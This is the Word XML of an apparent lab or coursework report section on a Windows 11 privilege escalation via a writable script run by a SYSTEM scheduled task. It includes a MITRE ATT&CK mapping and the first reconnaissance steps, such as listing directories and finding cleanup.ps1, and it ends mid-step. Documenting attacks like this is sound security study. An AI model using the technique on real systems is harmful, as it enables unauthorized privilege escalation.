          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w:rsidR="00500AD9" w:rsidP="14301521" w:rsidRDefault="14301521" w14:paraId="2812B242" w14:textId="651029AF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc220896686" w:id="25"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>3.2</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Incident #002 – Privileged Escalation via Insecure Scheduled Task Permissions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w:rsidRPr="003419C9" w:rsidR="00500AD9" w:rsidP="00500AD9" w:rsidRDefault="00500AD9" w14:paraId="704D59CD" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc220896687" w:id="26"/>
      <w:commentRangeStart w:id="27"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:commentRangeEnd w:id="27"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="27"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Mapping</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1472"/>
        <w:gridCol w:w="1499"/>
        <w:gridCol w:w="1499"/>
        <w:gridCol w:w="1502"/>
        <w:gridCol w:w="1498"/>
        <w:gridCol w:w="1712"/>
      </w:tblGrid>
      <w:tr w:rsidR="00500AD9" w:rsidTr="14301521" w14:paraId="777F9B0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rsidRPr="009F3FA8" w:rsidR="00500AD9" w:rsidP="001B4A08" w:rsidRDefault="00500AD9" w14:paraId="627B06C8" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="12"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1499" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="009F3FA8" w:rsidR="00500AD9" w:rsidP="001B4A08" w:rsidRDefault="00500AD9" w14:paraId="24C0037F"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Technique ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1499" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="009F3FA8" w:rsidR="00500AD9" w:rsidP="001B4A08" w:rsidRDefault="00500AD9" w14:paraId="7552D4A2"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Technique Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="009F3FA8" w:rsidR="00500AD9" w:rsidP="001B4A08" w:rsidRDefault="00500AD9" w14:paraId="05B43F38"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Sub-technique Name (if applicable)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1498" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="009F3FA8" w:rsidR="00500AD9" w:rsidP="001B4A08" w:rsidRDefault="00500AD9" w14:paraId="6EE9FE43"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Operating System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1712" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="009F3FA8" w:rsidR="00500AD9" w:rsidP="001B4A08" w:rsidRDefault="00500AD9" w14:paraId="21CC5604"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Permissions Required to perform attack (User/Admin/NIL)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidRPr="009F3FA8" w:rsidR="00500AD9" w:rsidP="001B4A08" w:rsidRDefault="00500AD9" w14:paraId="370C8CBA"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Cs w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="12"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00500AD9" w:rsidTr="14301521" w14:paraId="58A199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rsidRPr="009F3FA8" w:rsidR="00500AD9" w:rsidP="14301521" w:rsidRDefault="14301521" w14:paraId="756B451D" w14:textId="558EBB1F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1499" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="009F3FA8" w:rsidR="00500AD9" w:rsidP="14301521" w:rsidRDefault="14301521" w14:paraId="2F476731" w14:textId="2E750263">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>T1053</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1499" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="009F3FA8" w:rsidR="00500AD9" w:rsidP="14301521" w:rsidRDefault="14301521" w14:paraId="614E8DCD" w14:textId="09F2C2B9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Scheduled Task/Job</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="009F3FA8" w:rsidR="00500AD9" w:rsidP="14301521" w:rsidRDefault="14301521" w14:paraId="1DA2EADC" w14:textId="7A005F2A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Scheduled Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1498" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="009F3FA8" w:rsidR="00500AD9" w:rsidP="14301521" w:rsidRDefault="14301521" w14:paraId="0E18B74B" w14:textId="6CC20C8C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Windows 11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1712" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="009F3FA8" w:rsidR="00500AD9" w:rsidP="14301521" w:rsidRDefault="14301521" w14:paraId="653C62A7" w14:textId="3F31DAE9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>User</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="14301521" w:rsidP="14301521" w:rsidRDefault="14301521" w14:paraId="282F26EB" w14:textId="67308820">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="14301521" w:rsidP="14301521" w:rsidRDefault="14301521" w14:paraId="29E3582C" w14:textId="4FABD580">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Technique Justification:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> This incident demonstrates </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>T1053.005</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> because the adversary identifies a pre-existing scheduled task that executes a script with SYSTEM privileges. By exploiting weak file permissions, the adversary overwrites the script with malicious code, causing the Task Scheduler to execute the payload in an elevated security context.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="14301521" w:rsidP="14301521" w:rsidRDefault="14301521" w14:paraId="5292C67B" w14:textId="0B2ACD12">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00ED5F9B" w:rsidP="00ED5F9B" w:rsidRDefault="00ED5F9B" w14:paraId="599EF856" w14:textId="53A21461">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc220896688" w:id="28"/>
      <w:commentRangeStart w:id="29"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Attack Documentation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
      <w:commentRangeEnd w:id="29"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="29"/>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="003E49BF" w:rsidR="00656532" w:rsidP="00EA2F9F" w:rsidRDefault="0092402D" w14:paraId="49CC5039" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>irstly, I began by performing basic reconnaissance of the file system to find potential avenues for privilege escalation. I used the command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="003E49BF" w:rsidR="00656532" w:rsidP="00656532" w:rsidRDefault="008F7197" w14:paraId="11492C0D" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>ls C:\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="003E49BF" w:rsidR="00656532" w:rsidP="00656532" w:rsidRDefault="00656532" w14:paraId="0ABA9085" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="003E49BF" w:rsidR="008F7197" w:rsidP="00656532" w:rsidRDefault="008F7197" w14:paraId="1DC2667F" w14:textId="3F2BB48E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">to list the root directory, which immediately revealed a non-standard folder named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>TaskScripts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>. Seeing a custom folder like this in the root directory is a significant red flag, as such folders often contain automated scripts that may not have the same strict security permissions as standard Windows system directories.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="003E49BF" w:rsidR="00656532" w:rsidP="00656532" w:rsidRDefault="00656532" w14:paraId="49F0C841" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="003E49BF" w:rsidR="00656532" w:rsidP="00656532" w:rsidRDefault="00656532" w14:paraId="3F4302FC" w14:textId="08D6512C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20F4AD5F" wp14:editId="4F02F45E">
            <wp:extent cx="3710940" cy="1492250"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="449818871" name="Picture 2"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19796" name="Picture 2" descr="A screenshot of a computer  AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId42"/>
                    <a:srcRect b="42958"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3712090" cy="1492712"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="003E49BF" w:rsidR="00EA2F9F" w:rsidP="008F7197" w:rsidRDefault="00EA2F9F" w14:paraId="030034F0" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="003E49BF" w:rsidR="00656532" w:rsidP="008F7197" w:rsidRDefault="008F7197" w14:paraId="41045CBD" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">I then navigated into the directory using the command: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="003E49BF" w:rsidR="00656532" w:rsidP="008F7197" w:rsidRDefault="008F7197" w14:paraId="1A12B6C1" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>ls C:\TaskScripts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="003E49BF" w:rsidR="00656532" w:rsidP="008F7197" w:rsidRDefault="00656532" w14:paraId="39895FED" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="003E49BF" w:rsidR="008F7197" w:rsidP="008F7197" w:rsidRDefault="008F7197" w14:paraId="45E2C9EA" w14:textId="5AF9BB0A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">where I identified a file named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>cleanup.ps1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>. Since this script appeared to be part of an automated routine, I proceeded to investigate if it was being executed by a high-privilege account and if its permissions were insecure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="003E49BF" w:rsidR="004936D8" w:rsidP="008F7197" w:rsidRDefault="004936D8" w14:paraId="5B24EBD2" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="008F7197" w:rsidR="004936D8" w:rsidP="004936D8" w:rsidRDefault="004936D8" w14:paraId="34D8D067" w14:textId="53C958BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E5DC5CA" wp14:editId="3A9E68AA">
            <wp:extent cx="3710940" cy="1117467"/>
            <wp:effectExtent l="0" t="0" r="3810" b="6985"/>
            <wp:docPr id="806119796" name="Picture 2"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19796" name="Picture 2" descr="A screenshot of a computer  AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId42"/>
                    <a:srcRect t="57285"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3712090" cy="1117813"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="003E49BF" w:rsidR="008F7197" w:rsidP="0092402D" w:rsidRDefault="008F7197" w14:paraId="19A43B41" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="003E49BF" w:rsidR="0092402D" w:rsidP="0092402D" w:rsidRDefault="0092402D" w14:paraId="48DAC7B2" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="003E49BF" w:rsidR="14301521" w:rsidP="14301521" w:rsidRDefault="0028130A" w14:paraId="65268C32" w14:textId="2C1053F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Once I knew which file the system was using, I needed to see if I could change it. We need this step to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>prove that the system was weak</w:t>
      </w:r>
      <w:r>
        <w:rPr>
